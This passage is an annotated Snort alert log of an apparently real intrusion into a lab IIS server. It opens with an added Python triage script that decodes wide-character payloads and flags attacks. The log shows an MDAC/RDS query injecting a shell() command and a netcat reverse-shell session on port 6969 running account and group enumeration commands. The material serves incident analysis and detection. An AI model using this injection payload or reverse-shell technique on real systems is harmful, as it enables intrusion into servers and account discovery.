=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
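!@# The three msadcs.dll POSTs above carry the injected query as UTF-16LE, which this dump renders as 'S.e.l.e.c.t' with a dot for every NUL byte, so a plain string match on 'shell(' in the raw alert text never fires. The triage script below is an added example (not part of the original capture or its analysis): it splits records on the =+=+ divider lines, joins the wrapped payload, collapses the dotted wide-character runs back to ASCII, and then flags two things a defender wants from this log: an inbound RDS query that wraps a VBA shell() call, and an outbound cmd.exe prompt leaving the web server on a non-web port (the netcat session records). The sample records are constructed to mirror the page's layout; the 172.16. local prefix and port 80 as the only web port are assumptions.

```python
"""Triage of Snort-style alert records in the format used by this log.

Added example, not code from the original capture or its analysis.  Assumes
the monitored host lives in 172.16.0.0/16 and that 80 is its only web port.
"""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample, modelled on the records on this page (shortened).
SAMPLE_LOG = r"""[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:49:54.324722 213.116.251.162:1930 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12612 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0xA4B7CF0B Ack: 0x2CC52434 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .u.s.e.r.s. .>.>.h.e.h...t.x.t.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:15.267294 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56698 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBEF1C4 Ack: 0x9E43FCDB Win: 0x2076 TcpLen: 20
del heh.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:25:14.555344 172.16.1.106:80 -> 213.116.251.162:1764
TCP TTL:127 TOS:0x0 ID:54134 IpLen:20 DgmLen:267 DF
***AP*** Seq: 0x2CAE8C2F Ack: 0x8E35E9AE Win: 0x20AE TcpLen: 20
HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Content-Type: text/html....
"""

SEP_RE = re.compile(r"^(?:=\+)+=?\s*$", re.M)          # the =+=+ divider lines
ALERT_RE = re.compile(r"^\[\*\*\]\s*(?P<name>.*?)\s*\[\*\*\]\s*$")
FLOW_RE = re.compile(r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+"
                     r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
                     r"(?P<dst>[\d.]+):(?P<dport>\d+)\s*$")
# A UTF-16LE string as the dump prints it: printable char, dot (NUL), repeated.
# Two leading letters keep the match from starting inside a run of NUL dots.
WIDE_RE = re.compile(r"(?:[A-Za-z]\.){2}(?:[ -~]\.){5,}")
# '|shell("...")|' inside the Jet query is the RDS/MDAC command-execution pattern.
SHELL_RE = re.compile(r'\|\s*shell\s*\(\s*"(?P<cmd>[^"]*)"\s*\)\s*\|', re.I)
PROMPT_RE = re.compile(r"[A-Z]:\\[A-Za-z0-9 \\._-]*>")  # cmd.exe prompt, e.g. C:\>


@dataclass
class Record:
    name: str
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    payload: str


@dataclass
class Finding:
    kind: str
    record: Record
    detail: str


def parse_records(text: str) -> List[Record]:
    """Split the dump on divider lines; join the 64-column-wrapped payload."""
    out = []
    for chunk in SEP_RE.split(text):
        lines = chunk.strip("\n").splitlines()
        if len(lines) < 5:
            continue
        alert, flow = ALERT_RE.match(lines[0]), FLOW_RE.match(lines[1])
        if not (alert and flow):
            continue
        payload = "".join(lines[4:])  # lines 2-3 are the IP and TCP headers
        out.append(Record(alert["name"], flow["ts"], flow["src"], int(flow["sport"]),
                          flow["dst"], int(flow["dport"]), payload))
    return out


def collapse_wide(payload: str) -> str:
    """Turn 'S.e.l.e.c.t.' runs back into 'Select' by dropping every NUL dot."""
    return WIDE_RE.sub(lambda m: m.group(0)[::2], payload)


def triage(records: List[Record], local_prefix="172.16.", web_ports=(80,)) -> List[Finding]:
    findings = []
    for r in records:
        text = collapse_wide(r.payload)
        if r.dst.startswith(local_prefix) and r.dport in web_ports:
            m = SHELL_RE.search(text)
            if m:
                findings.append(Finding("mdac-shell-injection", r, m["cmd"]))
        elif r.src.startswith(local_prefix) and r.sport not in web_ports:
            m = PROMPT_RE.search(text)
            if m:
                findings.append(Finding("outbound-cmd-prompt", r, m.group(0)))
    return findings


if __name__ == "__main__":
    for f in triage(parse_records(SAMPLE_LOG)):
        r = f.record
        print(f"{r.ts} {f.kind:22} {r.src}:{r.sport} -> {r.dst}:{r.dport}  {f.detail}")
```

The two findings together are the story of this log: the shell injection gives the command that was run (here 'cmd /c net users >>heh.txt', including the file the output was appended to, which is what the clean-up commands later target), and the prompt detector catches every record of the port 6969 session regardless of which command was typed.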
[**] netcat session 6969 [**]
02/04-05:50:03.550356 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51322 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEEC91 Ack: 0x9E43FCB3 Win: 0x209E TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:04.096869 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51578 IpLen:20 DgmLen:750 DF
***AP*** Seq: 0x2CBEED59 Ack: 0x9E43FCB3 Win: 0x209E TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..02/04/01 06:48a
263 heh.txt..12/07/00 03:30p InetP
ub..12/07/00 03:12p Multimedia Files..12/
26/00 07:10p New Folder..01/26/01 02:10p
78,643,200 pagefile.sys..12/21/00 08:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:48a WINNT..12/26/00
07:09p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,643,785 b
ytes.. 1,690,861,056 bytes free....C:\>
..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:08.257201 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:53626 IpLen:20 DgmLen:172 DF
***AP*** Seq: 0x2CBEF01F Ack: 0x9E43FCC2 Win: 0x208F TcpLen: 20
yuper .......The name specified is not recognized as an..interna
l or external command, operable program or batch file.....C:\>..
C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Reads heh.txt from remote shell
[**] netcat session 6969 [**]
02/04-05:50:10.660668 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54906 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF0A3 Ack: 0x9E43FCCE Win: 0x2083 TcpLen: 20
type heh.txt....User accounts for \\.....-----------------------
--------------------------------------------------------..Admini
strator Guest IUSR_KENNY
..I
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:11.200217 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:55162 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0x2CBEF16B Ack: 0x9E43FCCE Win: 0x2083 TcpLen: 20
WAM_KENNY ..The command completed with one or more
errors........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Cleans up 'c:\heh.txt' using remote shell
[**] netcat session 6969 [**]
02/04-05:50:15.267294 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56698 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBEF1C4 Ack: 0x9E43FCDB Win: 0x2076 TcpLen: 20
del heh.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:20.575002 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59002 IpLen:20 DgmLen:96 DF
***AP*** Seq: 0x2CBEF1DD Ack: 0x9E43FCF0 Win: 0x2061 TcpLen: 20
cd program files....C:\Program Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Checks out contents of 'c:\program files\'
[**] netcat session 6969 [**]
02/04-05:50:20.975829 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59258 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF215 Ack: 0x9E43FCF2 Win: 0x205F TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files....12/21/00 08:59p
...12/21/00 08:59p
....12/0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:21.520033 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59514 IpLen:20 DgmLen:645 DF
***AP*** Seq: 0x2CBEF2DD Ack: 0x9E43FCF2 Win: 0x205F TcpLen: 20
7/00 03:11p Common Files..12/21/00 08:59
p D4..12/07/00 03:23p
ICW-Internet Connection Wizard..12/07/00 03:37p
Microsoft FrontPage..12/07/00 03:34p
Mts..12/07/00 03:23p Outlook Expres
s..11/26/00 06:42p Plus!..12/16/00 06:54
p Syslogd..11/26/00 06:56p
Windows NT.. 11 File(s) 0 byte
s.. 1,690,861,056 bytes free....C:\Prog
ram Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:26.583740 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:60282 IpLen:20 DgmLen:59 DF
***AP*** Seq: 0x2CBEF53A Ack: 0x9E43FCFA Win: 0x2057 TcpLen: 20
cd ......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:26.935985 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:60538 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF54D Ack: 0x9E43FCFE Win: 0x2053 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:27.421662 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:61050 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEF615 Ack: 0x9E43FCFE Win: 0x2053 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:48a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Leaves a calling card: writes 'Hi, i know that this a is a lab server, but patch the holes! :-)' to file README.NOW.Hax0r
[**] netcat session 6969 [**]
02/04-05:50:51.320224 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:6523 IpLen:20 DgmLen:144 DF
***AP*** Seq: 0x2CBEF8AB Ack: 0x9E43FD5A Win: 0x1FF7 TcpLen: 20
echo Hi, i know that this a ..is a lab server, but patch the hol
es! :-) >>README.NOW.Hax0r....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:54.024371 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:7035 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF913 Ack: 0x9E43FD5F Win: 0x1FF2 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:54.547456 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:7291 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x2CBEF9DB Ack: 0x9E43FD5F Win: 0x1FF2 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..02/04/01 06:49a
69 README.NOW.Hax0r..12/21/00 08:59p TEMP..02/04/01 06:48a WINNT..1
2/26/00 07:09p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,
643,591 bytes.. 1,690,861,056 bytes fre
e....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:06.442491 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8571 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEFCAA Ack: 0x9E43FD64 Win: 0x1FED TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:06.972588 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8827 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x2CBEFD72 Ack: 0x9E43FD64 Win: 0x1FED TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..02/04/01 06:49a
69 README.NOW.Hax0r..12/21/00 08:59p TEMP..02/04/01 06:48a WINNT..1
2/26/00 07:09p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,
643,591 bytes.. 1,690,861,056 bytes fre
e....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:31.180464 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:10875 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF0041 Ack: 0x9E43FD6F Win: 0x1FE2 TcpLen: 20
net group..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Runs 'net group' command from remote shell. This shows the domain groups.
[**] netcat session 6969 [**]
02/04-05:51:31.598565 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:11131 IpLen:20 DgmLen:292 DF
***AP*** Seq: 0x2CBF004C Ack: 0x9E43FD6F Win: 0x1FE2 TcpLen: 20
..Group Accounts for \\.....------------------------------------
-------------------------------------------..*Domain Admins
*Domain Guests *Domain Users ..The
command completed with one or more errors........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:35.484703 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:12923 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x2CBF0148 Ack: 0x9E43FD7F Win: 0x1FD2 TcpLen: 20
net localgroup..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to run 'net localgroup' from remote shell. This fails
[**] netcat session 6969 [**]
02/04-05:51:35.924989 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:13179 IpLen:20 DgmLen:176 DF
***AP*** Seq: 0x2CBF0158 Ack: 0x9E43FD7F Win: 0x1FD2 TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:44.097712 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:16251 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBF01E0 Ack: 0x9E43FD98 Win: 0x1FB9 TcpLen: 20
net group domain admins..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:44.626271 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:16763 IpLen:20 DgmLen:272 DF
***AP*** Seq: 0x2CBF01F9 Ack: 0x9E43FD98 Win: 0x1FB9 TcpLen: 20
The syntax of this command is:.......NET GROUP [groupname [/COMM
ENT:"text"]] [/DOMAIN].. groupname {/ADD [/COMMENT:"tex
t"] | /DELETE} [/DOMAIN].. groupname username [...] {/
ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:54.612905 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:19323 IpLen:20 DgmLen:176 DF
***AP*** Seq: 0x2CBF02E1 Ack: 0x9E43FDA9 Win: 0x1FA8 TcpLen: 20
.[Anet group /?..The name specified is not recognized as an..int
ernal or external command, operable program or batch file.....C:
\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:59.525411 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:21371 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CBF0369 Ack: 0x9E43FDB7 Win: 0x1F9A TcpLen: 20
net group ??..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:00.055057 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:21627 IpLen:20 DgmLen:272 DF
***AP*** Seq: 0x2CBF0377 Ack: 0x9E43FDB7 Win: 0x1F9A TcpLen: 20
The syntax of this command is:.......NET GROUP [groupname [/COMM
ENT:"text"]] [/DOMAIN].. groupname {/ADD [/COMMENT:"tex
t"] | /DELETE} [/DOMAIN].. groupname username [...] {/
ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:02.926866 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23419 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CBF045F Ack: 0x9E43FDC5 Win: 0x1F8C TcpLen: 20
net group /?..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:03.452181 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23675 IpLen:20 DgmLen:272 DF
***AP*** Seq: 0x2CBF046D Ack: 0x9E43FDC5 Win: 0x1F8C TcpLen: 20
The syntax of this command is:.......NET GROUP [groupname [/COMM
ENT:"text"]] [/DOMAIN].. groupname {/ADD [/COMMENT:"tex
t"] | /DELETE} [/DOMAIN].. groupname username [...] {/
ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:09.584701 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:25723 IpLen:20 DgmLen:52 DF
***AP*** Seq: 0x2CBF0555 Ack: 0x9E43FDD1 Win: 0x1F80 TcpLen: 20
net group ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:10.079461 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:25979 IpLen:20 DgmLen:292 DF
***AP*** Seq: 0x2CBF0561 Ack: 0x9E43FDD1 Win: 0x1F80 TcpLen: 20
..Group Accounts for \\.....------------------------------------
-------------------------------------------..*Domain Admins
*Domain Guests *Domain Users ..The
command completed with one or more errors........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:32.169335 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28539 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x2CBF065D Ack: 0x9E43FDE1 Win: 0x1F70 TcpLen: 20
net localgroup..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:32.704689 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28795 IpLen:20 DgmLen:176 DF
***AP*** Seq: 0x2CBF066D Ack: 0x9E43FDE1 Win: 0x1F70 TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:48.291518 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32635 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x2CBF06F5 Ack: 0x9E43FE00 Win: 0x1F51 TcpLen: 20
net localgroup /domain admins..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:52:48.826409 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32891 IpLen:20 DgmLen:176 DF
***AP*** Seq: 0x2CBF0714 Ack: 0x9E43FE00 Win: 0x1F51 TcpLen: 20
System error 1312 has occurred...... A specified logon session d
oes not exist. It may already have... been terminated........C:
\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:53:06.418014 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:36731 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x2CBF079C Ack: 0x9E43FE1E Win: 0x1F33 TcpLen: 20
net localgroup domain admins..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:53:06.957276 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:36987 IpLen:20 DgmLen:281 DF
***AP*** Seq: 0x2CBF07BA Ack: 0x9E43FE1E Win: 0x1F33 TcpLen: 20
The syntax of this command is:.......NET LOCALGROUP [groupname [
/COMMENT:"text"]] [/DOMAIN].. groupname {/ADD [/COM
MENT:"text"] | /DELETE} [/DOMAIN].. groupname name
[...] {/ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:53:07.670085 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37243 IpLen:20 DgmLen:281 DF
***AP*** Seq: 0x2CBF07BA Ack: 0x9E43FE1E Win: 0x1F33 TcpLen: 20
The syntax of this command is:.......NET LOCALGROUP [groupname [
/COMMENT:"text"]] [/DOMAIN].. groupname {/ADD [/COM
MENT:"text"] | /DELETE} [/DOMAIN].. groupname name
[...] {/ADD | /DELETE} [/DOMAIN]......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:53:27.259389 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38779 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF08AB Ack: 0x9E43FE29 Win: 0x1F28 TcpLen: 20
net users..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# From the remote shell, the intruder plays around with various net commands.
!@# Likely this is an effort to discover the name of the local administrators group.
!@# The command which would reveal this, 'net localgroup', will not run.
[**] netcat session 6969 [**]
02/04-05:53:27.781758 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39035 IpLen:20 DgmLen:315 DF
***AP*** Seq: 0x2CBF08B6 Ack: 0x9E43FE29 Win: 0x1F28 TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to try to add user 'IWAM_KENNY' to the localgroup 'Domain Admins' (which doesn't exist)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:53:40.771431 213.116.251.162:1940 -> 172.16.1.106:80
